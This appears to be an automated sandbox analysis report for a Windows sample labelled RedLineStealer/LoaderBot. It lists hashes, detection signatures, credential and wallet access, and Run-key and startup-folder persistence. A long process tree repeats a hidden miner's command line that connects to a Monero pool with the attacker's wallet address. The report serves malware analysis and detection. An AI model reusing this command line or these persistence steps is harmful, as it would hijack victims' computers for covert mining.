loaderbot | 11b7d2de5330eded7451a4fb417b91ecad2c7d6a9aea7fee632facaf038e8750

Analysis

max time kernel
153s
max time network
161s
platform
windows7_x64
resource
win7-en-20211104
submitted
02-12-2021 13:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe
Size

217KB
MD5

015ed94ce4a51b250d7022a6ee042db1
SHA1

749b794ca8eb67f7b688712d9d3f7e74001a8d3d
SHA256

11b7d2de5330eded7451a4fb417b91ecad2c7d6a9aea7fee632facaf038e8750
SHA512

80740104f9b6e1e6d00a7d05bc7f2666695fd1965b28c9c24e83dd34d16084adf1dc21182b6bb14623d6ac735c047d1259d933aa7c4cca31a956d06fe3cb14ff

Score

10^/10

loaderbot discovery loader miner persistence spyware stealer suricata

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/files/0x0005000000012625-62.dat	loaderbot
behavioral1/files/0x0005000000012625-60.dat	loaderbot
behavioral1/files/0x0005000000012625-63.dat	loaderbot

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

pid	Process
1700	miner.exe
1864	Driver.exe
1012	Driver.exe
2004	Driver.exe
1992	Driver.exe
1160	Driver.exe
764	Driver.exe
1820	Driver.exe
1988	Driver.exe
1736	Driver.exe
1536	Driver.exe
456	Driver.exe
1656	Driver.exe
1448	Driver.exe
1040	Driver.exe
1328	Driver.exe
1016	Driver.exe
1940	Driver.exe
1284	Driver.exe
1652	Driver.exe
764	Driver.exe
752	Driver.exe
1980	Driver.exe
1944	Driver.exe
1984	Driver.exe
988	Driver.exe
1608	Driver.exe
1496	Driver.exe
792	Driver.exe
1956	Driver.exe
1612	Driver.exe
856	Driver.exe
1608	Driver.exe
1516	Driver.exe
688	Driver.exe
1332	Driver.exe
484	Driver.exe
1652	Driver.exe
472	Driver.exe
1656	Driver.exe
1864	Driver.exe
1988	Driver.exe
1304	Driver.exe
984	Driver.exe
1504	Driver.exe
1588	Driver.exe
988	Driver.exe
2044	Driver.exe
764	Driver.exe
524	Driver.exe
1796	Driver.exe
1972	Driver.exe
1292	Driver.exe
748	Driver.exe
1164	Driver.exe
1748	Driver.exe
1552	Driver.exe
1496	Driver.exe
816	Driver.exe
1936	Driver.exe
1984	Driver.exe
1540	Driver.exe
984	Driver.exe
856	Driver.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	miner.exe

Loads dropped DLL 2 IoCs

pid	Process
1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe
1700	miner.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\miner.exe"	miner.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe
1700	miner.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1700	miner.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe
Token: SeDebugPrivilege	1700	miner.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 1700	1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe	29
PID 1408 wrote to memory of 1700	1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe	29
PID 1408 wrote to memory of 1700	1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe	29
PID 1408 wrote to memory of 1700	1408	SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe	29
PID 1700 wrote to memory of 1864	1700	miner.exe	30
PID 1700 wrote to memory of 1864	1700	miner.exe	30
PID 1700 wrote to memory of 1864	1700	miner.exe	30
PID 1700 wrote to memory of 1864	1700	miner.exe	30
PID 1700 wrote to memory of 1012	1700	miner.exe	32
PID 1700 wrote to memory of 1012	1700	miner.exe	32
PID 1700 wrote to memory of 1012	1700	miner.exe	32
PID 1700 wrote to memory of 1012	1700	miner.exe	32
PID 1700 wrote to memory of 2004	1700	miner.exe	34
PID 1700 wrote to memory of 2004	1700	miner.exe	34
PID 1700 wrote to memory of 2004	1700	miner.exe	34
PID 1700 wrote to memory of 2004	1700	miner.exe	34
PID 1700 wrote to memory of 1992	1700	miner.exe	36
PID 1700 wrote to memory of 1992	1700	miner.exe	36
PID 1700 wrote to memory of 1992	1700	miner.exe	36
PID 1700 wrote to memory of 1992	1700	miner.exe	36
PID 1700 wrote to memory of 1160	1700	miner.exe	38
PID 1700 wrote to memory of 1160	1700	miner.exe	38
PID 1700 wrote to memory of 1160	1700	miner.exe	38
PID 1700 wrote to memory of 1160	1700	miner.exe	38
PID 1700 wrote to memory of 764	1700	miner.exe	40
PID 1700 wrote to memory of 764	1700	miner.exe	40
PID 1700 wrote to memory of 764	1700	miner.exe	40
PID 1700 wrote to memory of 764	1700	miner.exe	40
PID 1700 wrote to memory of 1820	1700	miner.exe	42
PID 1700 wrote to memory of 1820	1700	miner.exe	42
PID 1700 wrote to memory of 1820	1700	miner.exe	42
PID 1700 wrote to memory of 1820	1700	miner.exe	42
PID 1700 wrote to memory of 1988	1700	miner.exe	44
PID 1700 wrote to memory of 1988	1700	miner.exe	44
PID 1700 wrote to memory of 1988	1700	miner.exe	44
PID 1700 wrote to memory of 1988	1700	miner.exe	44
PID 1700 wrote to memory of 1736	1700	miner.exe	46
PID 1700 wrote to memory of 1736	1700	miner.exe	46
PID 1700 wrote to memory of 1736	1700	miner.exe	46
PID 1700 wrote to memory of 1736	1700	miner.exe	46
PID 1700 wrote to memory of 1536	1700	miner.exe	48
PID 1700 wrote to memory of 1536	1700	miner.exe	48
PID 1700 wrote to memory of 1536	1700	miner.exe	48
PID 1700 wrote to memory of 1536	1700	miner.exe	48
PID 1700 wrote to memory of 456	1700	miner.exe	50
PID 1700 wrote to memory of 456	1700	miner.exe	50
PID 1700 wrote to memory of 456	1700	miner.exe	50
PID 1700 wrote to memory of 456	1700	miner.exe	50
PID 1700 wrote to memory of 1656	1700	miner.exe	52
PID 1700 wrote to memory of 1656	1700	miner.exe	52
PID 1700 wrote to memory of 1656	1700	miner.exe	52
PID 1700 wrote to memory of 1656	1700	miner.exe	52
PID 1700 wrote to memory of 1448	1700	miner.exe	54
PID 1700 wrote to memory of 1448	1700	miner.exe	54
PID 1700 wrote to memory of 1448	1700	miner.exe	54
PID 1700 wrote to memory of 1448	1700	miner.exe	54
PID 1700 wrote to memory of 1040	1700	miner.exe	56
PID 1700 wrote to memory of 1040	1700	miner.exe	56
PID 1700 wrote to memory of 1040	1700	miner.exe	56
PID 1700 wrote to memory of 1040	1700	miner.exe	56
PID 1700 wrote to memory of 1328	1700	miner.exe	58
PID 1700 wrote to memory of 1328	1700	miner.exe	58
PID 1700 wrote to memory of 1328	1700	miner.exe	58
PID 1700 wrote to memory of 1328	1700	miner.exe	58

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Spyware.RedLineStealer.28182.28176.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Users\Admin\AppData\Local\Temp\miner.exe
  "C:\Users\Admin\AppData\Local\Temp\miner.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1864
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1012
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:2004
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1992
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1160
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:764
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1820
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1736
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1536
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:456
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1656
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1448
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1040
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1328
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1016
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1940
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1284
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1652
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:764
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:752
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1980
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1944
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1608
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1496
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:792
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1956
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1612
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:856
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1608
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1516
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:688
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1332
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:484
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1652
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:472
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1656
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1864
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1304
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1504
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
